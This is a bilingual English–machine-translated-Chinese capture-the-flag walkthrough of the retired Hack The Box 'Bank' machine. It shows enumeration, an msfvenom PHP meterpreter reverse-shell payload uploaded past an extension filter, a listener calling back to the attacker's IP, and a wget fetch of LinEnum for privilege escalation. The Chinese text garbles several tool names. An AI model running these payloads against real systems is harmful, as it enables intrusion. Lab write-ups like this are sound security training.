推箱子2-向右推!_保持冷静，砍箱子-银行

推箱子2-向右推!

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。它包含一些不断更新的挑战。他们中的一些人正在模拟现实世界的场景，而另一些人则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.

注意。 只允许注销HTB机器。

Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry

银行是一台相对简单的机器，但是正确的Web枚举对于找到必要的输入数据至关重要

We will use the following tools to pawn the box on a Kali Linux box:

我们将使用以下工具在Kali Linux盒子上放置盒子：

nmap
纳帕
gobuster
猛击者
Searchsploit
Searchsploit
msfconsole
msfconsole
metasploit
元胞
meterperter
计价器
LinEnum
LinEnum

Let's get started.

让我们开始吧。

第1步-侦察 (Step 1 - Reconnaissance)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。在此阶段花更多的时间来获取尽可能多的信息总是更好的选择。

端口扫描 (Port scanning)

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap(网络映射器)。 Nmap是一个免费的开源实用程序，用于网络发现和安全审核。它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用许多命令来扫描网络。如果您想了解更多信息，可以在这里查看文档。

I use the following command to perform an intensive scan:

我使用以下命令执行密集扫描：

nmap -A -v bank.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increase verbosity level

-v：提高详细程度

bank.htb: hostname for the Bank box

bank.htb： “银行”框的主机名

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

如果发现结果有点不堪重负，则可以执行另一个命令以仅获取打开的端口。

nmap bank.htb

We can see that there are 3 open ports:

我们可以看到有3个开放端口：

Port 22, Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

端口22 ，安全外壳(SSH)，安全登录，文件传输(scp，sftp)和端口转发

Port 53, Domain Name System (DNS)

端口53 ，域名系统(DNS)

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

端口 80 ，超文本传输协议(HTTP)最常使用的端口

目录扫描 (Directory scanning)

I use Gobuster. Gobuster is a directory scanner written in Go. More info on the tool here. Gobuster uses wordlists on Kali which are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here

我用Gobuster。 Gobuster是用Go编写的目录扫描程序。在工具更多信息在这里。 Gobuster在/ ali / share / wordlists目录中的Kali上使用单词表。我正在使用来自dirb和dirbuster的单词列表，但是您可以在此处从SecLists下载更多单词列表

I use this command for the dirb common.txt wordlist

我将此命令用于dirb common.txt单词表

gobuster dir -u bank.htb -w /usr/share/wordlists/dirb/common.txt

I can see some interesting folders. I do another directory scan with a different wordlist.

我可以看到一些有趣的文件夹。我用另一个单词表进行另一个目录扫描。

gobuster dir -u bank.htb -w /usr/share/worldlists/dirbuster/directory-list-lowercase-2.3-medium.txt

第2步-访问网页 (Step 2 - Visiting the web page)

From the reconnaissance phase, I decide to start with port 80. It points to an Apache2 Ubuntu Default page. We need to set the hostname. We will follow the standard convention for the HTB machines, bank.htb

在侦察阶段，我决定从端口80开始。它指向Apache2 Ubuntu Default页面。我们需要设置主机名。我们将遵循HTB机器的标准惯例bank.htb

I add bank on the /etc/hosts file

我在/ etc / hosts文件中添加银行

nano /etc/hosts

with

与

10.10.10.29     bank.htb

I check the file with

我检查文件

cat /etc/hosts

When I navigate to bank.htb, I can see a login page now

当我导航到bank.htb时，我现在可以看到一个登录页面

From the gobuster reconnaissance, I found some folders. I navigate to /balance-transfer

从魔术师的侦察中，我找到了一些文件夹。我导航到/ balance-transfer

I have a look at a couple of files. All the files seems to have the full name, email and password encrypted.

我看几个文件。所有文件似乎都已加密了全名，电子邮件和密码。

I go back to the main page and I click on the Size tab to sort the transfers. I can see that one of the file is different

我回到主页，然后单击“ 大小”选项卡对传输进行排序。我可以看到其中一个文件不同

When I click on the file, I see an error message at the top. The encryption failed for this file. I can see all the details in plain text

当我单击文件时，在顶部看到错误消息。该文件的加密失败。我可以用纯文本形式查看所有详细信息

I go back to the login panel and enter the credentials. I now have access to the dashboard of the HTB Bank. Nothing interesting on this page, so I move to the Support page

我返回登录面板并输入凭据。我现在可以访问HTB银行的仪表板。此页面上没有任何有趣的内容，因此我转到“ 支持”页面

On the Support page, I can upload files. I will try to upload a payload

在支持页面上，我可以上传文件。我将尝试上传有效载荷

第3步-使用MSFvenom进行漏洞利用 (Step 3 - Using MSFvenom to craft an exploit)

We will use MSFvenom, which is a payload generator . You can learn more about it here

我们将使用MSFvenom，它是有效负载生成器。您可以在此处了解更多信息

But first, let's see on Metasploit Framework which payload we could use to craft our exploit

但是首先，让我们在Metasploit Framework上看看我们可以使用哪些有效载荷来制作漏洞利用程序

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

我们知道我们需要创建一个反向shell ，这是目标计算机与攻击计算机进行通信的一种shell。攻击机具有一个侦听器端口，在侦听器端口上接收连接，通过使用该连接，可以执行代码或命令。

The reverse TCP shell should be for PHP and we will use Meterpreter

反向TCP Shell应该用于PHP，我们将使用Meterpreter

From the Offensive Security website, we get this definition for Meterpreter

从“进攻性安全”网站上，我们获得了Meterpreter的定义

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一种高级的，动态可扩展的有效负载，它使用内存中的 DLL注入暂存器，并在运行时通过网络进行了扩展。它通过暂存器套接字进行通信，并提供全面的客户端Ruby API。它具有命令历史记录，制表符完成，通道等功能。

You can read more about Meterpreter here

您可以在此处阅读有关Meterpreter的更多信息

I launch Metasploit and search for reverse TCP payloads. I use the following command

我启动Metasploit并搜索反向TCP有效负载。我使用以下命令

search php meterpreter reverse_tcp

I find an interesting payload, number 594, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker

我找到了一个有趣的有效载荷，编号594，它是反向TCP阶段程序 。该有效负载通过Reflective Dll Injection有效负载注入抄表器服务器DLL，并连接回攻击者

payload/php/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit

现在让我们回到msfvenom来进行我们的利用

I use the following command

我使用以下命令

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.36 lport=443 -f raw > HTBbankshell.php

I then check with ls if the file has been created

然后我与ls检查是否已创建文件

and I cat the file to see the exploit with

然后我整理文件以查看漏洞利用

cat HTBbankshell.php

I go back to the support page. I add the title, the message and upload the file on the form

我回到支持页面。我添加标题，消息并将文件上传到表单上

I click on the submit button and I see an error message. The file type doesn't seem to work

我单击提交按钮，然后看到错误消息。文件类型似乎不起作用

I check the source code and I see a comment that indicates that the file extension .htb is needed to execute php for debugging purposes only

我检查了源代码，并看到一条注释，该注释指示文件扩展名.htb是执行php所需的，仅用于调试目的

I then change the extension of my payload from HTBbankshell.php to HTBbankshell.htb

然后，我将有效负载的扩展名从HTBbankshell.php更改为HTBbankshell.htb

My file is now ready to be uploaded on the support page

我的文件现在可以在支持页面上载了

And it seems to work! The payload has been uploaded on the support page

它似乎有效！有效负载已上传到支持页面上

第4步-使用Metasploit设置侦听器 (Step 4 - Setting up a listener with Metasploit)

Back on Metasploit where I use the following command to set the payload handler

回到Metasploit，在这里我使用以下命令设置有效负载处理程序

use exploit/multi/handler

I first set up the payload

我首先设置有效载荷

set payload php/meterpreter/reverse_tcp

Then the LHOST

然后LHOST

set lhost 10.10.14.36

And finally the LPORT

最后是LPORT

set lport 4444

If we check the options now, we should see that everything is set up

如果我们现在检查选项，我们应该看到一切都已设置

Let's run the exploit.

让我们运行漏洞利用程序。

After this message appears

此消息出现后

Started reverse TCP handler on 10.10.14.36:4444

go back to the browser and refresh the page where the malicious script is hosted

返回浏览器并刷新托管恶意脚本的页面

bank.htb/uploads/HTBbankshell.php

You should then see a Meterpreter session created

然后，您应该看到一个Meterpreter会话已创建

I start by gathering some information with getuid which returns the real user ID of the calling process and sysinfo

我首先使用getuid收集一些信息，该信息返回调用进程和sysinfo的真实用户ID。

步骤5-寻找user.txt标志 (Step 5 - Looking for the user.txt flag)

I start navigating to root and list the folders/files.

我开始导航到root并列出文件夹/文件。

I move to the home directory with

我将移动到主目录

cd home

And I can see a user called chris

我可以看到一个叫chris的用户

I move to the chris directory and when I list the files...

我移到chris目录，当我列出文件时...

I find the user.txt file! To read the content of the file I use the command

我找到了user.txt文件！要读取文件的内容，请使用以下命令

cat user.txt

Now that we have the user flag, let's find the root flag!

现在有了用户标志，让我们找到根标志！

步骤6-执行特权升级 (Step 6 - Performing Privilege Escalation)

I try to navigate to the root folder and the access is denied

我尝试导航到根文件夹，但访问被拒绝

I will use LinEnum to enumerate more information from this machine. LinEnum is used for scripted local Linux enumeration and privilege escalation checks. More info here

我将使用LinEnum枚举此机器的更多信息。 LinEnum用于脚本化的本地Linux枚举和特权升级检查。更多信息在这里

I fetch LinEnum from GitHub with

我从GitHub上获取LinEnum

wget https://https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

I check with this command if the script has been correctly fetched

我使用此命令检查脚本是否已正确提取

ls -la

I use the following command

我使用以下命令

chmod 777 LinEnum.sh

to change the file permission and make it readable, writable and executable by everyone

更改文件权限并使其所有人可读，可写和可执行

Within meterpreter I check the location of the file with

在meterpreter中，我使用以下命令检查文件的位置

lls -S "LinEnum.sh"

I start a php server on another terminal with

我在另一个终端上启动一个php服务器

php -S 10.10.14.36:4444

I type the following command to get a standard shell on the target system

我键入以下命令以在目标系统上获取标准外壳

shell

I spawn a TTY shell with

我生成了一个TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash/")'

And I transfer the file to the machine with

然后我将文件传输到机器

wget http://10.10.14.36:4444/LinEnum.sh -O /tmp/LinEnum.sh

where I copy the file from my Kali box to the machine temp folder

我将文件从我的Kali盒复制到机器临时文件夹的位置

I then navigate to the temp folder to check if the file has been correctly moved

然后，我导航到temp文件夹以检查文件是否已正确移动

I then run the script with

然后，我使用

sh ./LinEnum.sh

The scan gives me a lot of information. I look for the interesting files section. I check the SUID files section. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it

扫描为我提供了很多信息。我在寻找有趣的文件部分。我检查了SUID文件部分。 SUID定义为授予用户临时权限，使其具有文件所有者(而不是运行它的用户)的权限来运行程序/文件

I spot an interesting file

我发现了一个有趣的文件